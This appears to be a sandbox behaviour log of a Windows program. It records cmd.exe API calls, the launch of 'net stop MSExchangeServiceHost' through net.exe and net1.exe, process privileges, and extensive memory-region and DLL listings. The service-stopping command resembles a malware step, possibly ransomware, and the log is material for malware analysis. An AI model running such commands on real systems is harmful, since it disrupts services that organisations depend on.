[0140.559] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0140.559] GetConsoleTitleW (in: lpConsoleTitle=0x46df24c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.559] InitializeProcThreadAttributeList (in: lpAttributeList=0x46df178, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x46df15c | out: lpAttributeList=0x46df178, lpSize=0x46df15c) returned 1 [0140.559] UpdateProcThreadAttribute (in: lpAttributeList=0x46df178, dwFlags=0x0, Attribute=0x60001, lpValue=0x46df164, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x46df178, lpPreviousValue=0x0) returned 1 [0140.559] GetStartupInfoW (in: lpStartupInfo=0x46df1b0 | out: lpStartupInfo=0x46df1b0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0140.559] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0140.559] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0140.559] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0140.559] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.559] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.559] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.559] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0140.559] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0140.559] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0140.559] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0140.559] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0140.559] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0140.559] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0140.559] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0140.559] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0140.559] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0140.559] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0140.559] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.559] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.560] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.560] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.560] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.560] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.560] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.560] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.560] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.560] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.560] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.560] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.560] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.560] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.560] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.560] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.560] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.560] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.560] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.560] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.560] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.560] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0140.561] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeServiceHost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x46df100*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeServiceHost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x46df14c | out: lpCommandLine="net stop MSExchangeServiceHost", lpProcessInformation=0x46df14c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x594, dwThreadId=0xc6c)) returned 1 [0140.566] CloseHandle (hObject=0xa4) returned 1 [0140.567] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0140.567] GetEnvironmentStringsW () returned 0x49b9ee0* [0140.567] FreeEnvironmentStringsA (penv="=") returned 1 [0140.567] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0140.686] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x46df0e4 | out: lpExitCode=0x46df0e4*=0x2) returned 1 [0140.686] CloseHandle (hObject=0xa8) returned 1 [0140.686] _vsnwprintf (in: _Buffer=0x46df1cc, _BufferCount=0x13, _Format="%08X", _ArgList=0x46df0ec | out: _Buffer="00000002") returned 8 [0140.686] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0140.686] GetEnvironmentStringsW () returned 0x49b7d78* [0140.686] FreeEnvironmentStringsA (penv="=") returned 1 [0140.686] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0140.686] GetEnvironmentStringsW () returned 0x49b7d78* [0140.686] FreeEnvironmentStringsA (penv="=") returned 1 [0140.686] DeleteProcThreadAttributeList (in: lpAttributeList=0x46df178 | out: lpAttributeList=0x46df178) [0140.686] _get_osfhandle (_FileHandle=1) returned 0x3c [0140.686] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0140.686] _get_osfhandle (_FileHandle=1) returned 0x3c [0140.686] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0140.687] _get_osfhandle (_FileHandle=0) returned 0x38 [0140.687] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0140.687] SetConsoleInputExeNameW () returned 0x1 [0140.687] GetConsoleOutputCP () returned 0x1b5 [0140.687] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0140.687] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.687] exit (_Code=2) Thread: id = 744 os_tid = 0xd40 Process: id = "254" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2a5de000" os_pid = "0xc2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "253" os_parent_pid = "0xd1c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12140 start_va = 0x7fc72000 end_va = 0x7fc72fff entry_point = 0x0 region_type = private name = "private_0x000000007fc72000" filename = "" Region: id = 12141 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12142 start_va = 0xe36ec20000 end_va = 0xe36ec3ffff entry_point = 0x0 region_type = private name = "private_0x000000e36ec20000" filename = "" Region: id = 12143 start_va = 0xe36ec40000 end_va = 0xe36ec53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e36ec40000" filename = "" Region: id = 12144 start_va = 0xe36ec60000 end_va = 0xe36ec9ffff entry_point = 0x0 region_type = private name = "private_0x000000e36ec60000" filename = "" Region: id = 12145 start_va = 0x7df5ffc30000 end_va = 0x7ff5ffc2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffc30000" filename = "" Region: id = 12146 start_va = 0x7ff6c43e0000 end_va = 0x7ff6c4402fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c43e0000" filename = "" Region: id = 12147 start_va = 0x7ff6c440d000 end_va = 0x7ff6c440dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c440d000" filename = "" Region: id = 12148 start_va = 0x7ff6c440e000 end_va = 0x7ff6c440ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c440e000" filename = "" Region: id = 12149 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 12150 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12151 start_va = 0xe36ec20000 end_va = 0xe36ec2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e36ec20000" filename = "" Region: id = 12152 start_va = 0xe36ec30000 end_va = 0xe36ec36fff entry_point = 0x0 region_type = private name = "private_0x000000e36ec30000" filename = "" Region: id = 12153 start_va = 0xe36eca0000 end_va = 0xe36ed5dfff entry_point = 0xe36eca0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12154 start_va = 0xe36ed60000 end_va = 0xe36ed9ffff entry_point = 0x0 region_type = private name = "private_0x000000e36ed60000" filename = "" Region: id = 12155 start_va = 0xe36eda0000 end_va = 0xe36eda0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e36eda0000" filename = "" Region: id = 12156 start_va = 0xe36edb0000 end_va = 0xe36edb6fff entry_point = 0x0 region_type = private name = "private_0x000000e36edb0000" filename = "" Region: id = 12157 start_va = 0xe36edc0000 end_va = 0xe36eebffff entry_point = 0x0 region_type = private name = "private_0x000000e36edc0000" filename = "" Region: id = 12158 start_va = 0xe36eec0000 end_va = 0xe36eec0fff entry_point = 0x0 region_type = private name = "private_0x000000e36eec0000" filename = "" Region: id = 12159 start_va = 0xe36eed0000 end_va = 0xe36eed0fff entry_point = 0x0 region_type = private name = "private_0x000000e36eed0000" filename = "" Region: id = 12160 start_va = 0xe36ef90000 end_va = 0xe36ef9ffff entry_point = 0x0 region_type = private name = "private_0x000000e36ef90000" filename = "" Region: id = 12161 start_va = 0xe36efa0000 end_va = 0xe36f127fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e36efa0000" filename = "" Region: id = 12162 start_va = 0xe36f130000 end_va = 0xe36f2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e36f130000" filename = "" Region: id = 12163 start_va = 0xe36f2c0000 end_va = 0xe3706bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e36f2c0000" filename = "" Region: id = 12164 start_va = 0x7ff6c42e0000 end_va = 0x7ff6c43dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c42e0000" filename = "" Region: id = 12165 start_va = 0x7ff6c440b000 end_va = 0x7ff6c440cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c440b000" filename = "" Region: id = 12166 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 12167 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 12168 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12169 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12170 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 12171 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12172 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12173 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12174 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12175 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12176 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12177 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 12178 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 12179 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 741 os_tid = 0x114 Thread: id = 742 os_tid = 0x714 Thread: id = 743 os_tid = 0xc7c Process: id = "255" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x2a7d9000" os_pid = "0x594" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "253" os_parent_pid = "0xd1c" cmd_line = "net stop MSExchangeServiceHost" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12193 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 12194 start_va = 0x370000 end_va = 0x436ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 12195 start_va = 0x4370000 end_va = 0x438ffff entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 12196 start_va = 0x4390000 end_va = 0x4391fff entry_point = 0x0 region_type = private name = "private_0x0000000004390000" filename = "" Region: id = 12197 start_va = 0x43a0000 end_va = 0x43b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000043a0000" filename = "" Region: id = 12198 start_va = 0x43c0000 end_va = 0x43fffff entry_point = 0x0 region_type = private name = "private_0x00000000043c0000" filename = "" Region: id = 12199 start_va = 0x4400000 end_va = 0x447ffff entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 12200 start_va = 0x4480000 end_va = 0x4483fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004480000" filename = "" Region: id = 12201 start_va = 0x4490000 end_va = 0x4490fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004490000" filename = "" Region: id = 12202 start_va = 0x44a0000 end_va = 0x44a1fff entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 12203 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 12204 start_va = 0x7eba0000 end_va = 0x7ebc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eba0000" filename = "" Region: id = 12205 start_va = 0x7ebcb000 end_va = 0x7ebcdfff entry_point = 0x0 region_type = private name = "private_0x000000007ebcb000" filename = "" Region: id = 12206 start_va = 0x7ebce000 end_va = 0x7ebcefff entry_point = 0x0 region_type = private name = "private_0x000000007ebce000" filename = "" Region: id = 12207 start_va = 0x7ebcf000 end_va = 0x7ebcffff entry_point = 0x0 region_type = private name = "private_0x000000007ebcf000" filename = "" Region: id = 12208 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12209 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 12210 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 12211 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12212 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 12213 start_va = 0x4650000 end_va = 0x465ffff entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 12214 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 12215 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 12216 start_va = 0x44f0000 end_va = 0x45effff entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 12217 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 745 os_tid = 0xc6c Thread: id = 746 os_tid = 0xd24 Process: id = "256" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x159f1000" os_pid = "0xd30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "255" os_parent_pid = "0x594" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeServiceHost" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12218 start_va = 0x160000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 12219 start_va = 0x180000 end_va = 0x181fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 12220 start_va = 0x190000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 12221 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 12222 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 12223 start_va = 0x270000 end_va = 0x273fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 12224 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 12225 start_va = 0x290000 end_va = 0x291fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 12226 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 12227 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 12228 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 12229 start_va = 0x7eda0000 end_va = 0x7edc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eda0000" filename = "" Region: id = 12230 start_va = 0x7edc8000 end_va = 0x7edc8fff entry_point = 0x0 region_type = private name = "private_0x000000007edc8000" filename = "" Region: id = 12231 start_va = 0x7edcc000 end_va = 0x7edcefff entry_point = 0x0 region_type = private name = "private_0x000000007edcc000" filename = "" Region: id = 12232 start_va = 0x7edcf000 end_va = 0x7edcffff entry_point = 0x0 region_type = private name = "private_0x000000007edcf000" filename = "" Region: id = 12233 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12234 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 12235 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 12236 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12237 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 12238 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 12239 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 12240 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 12241 start_va = 0x4c0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 12242 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 12243 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 12244 start_va = 0x170000 end_va = 0x173fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 12245 start_va = 0x2a0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 12246 start_va = 0x360000 end_va = 0x41dfff entry_point = 0x360000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12247 start_va = 0x420000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 12248 start_va = 0x760000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 12249 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 12250 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 12251 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 12252 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 12253 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 12254 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = 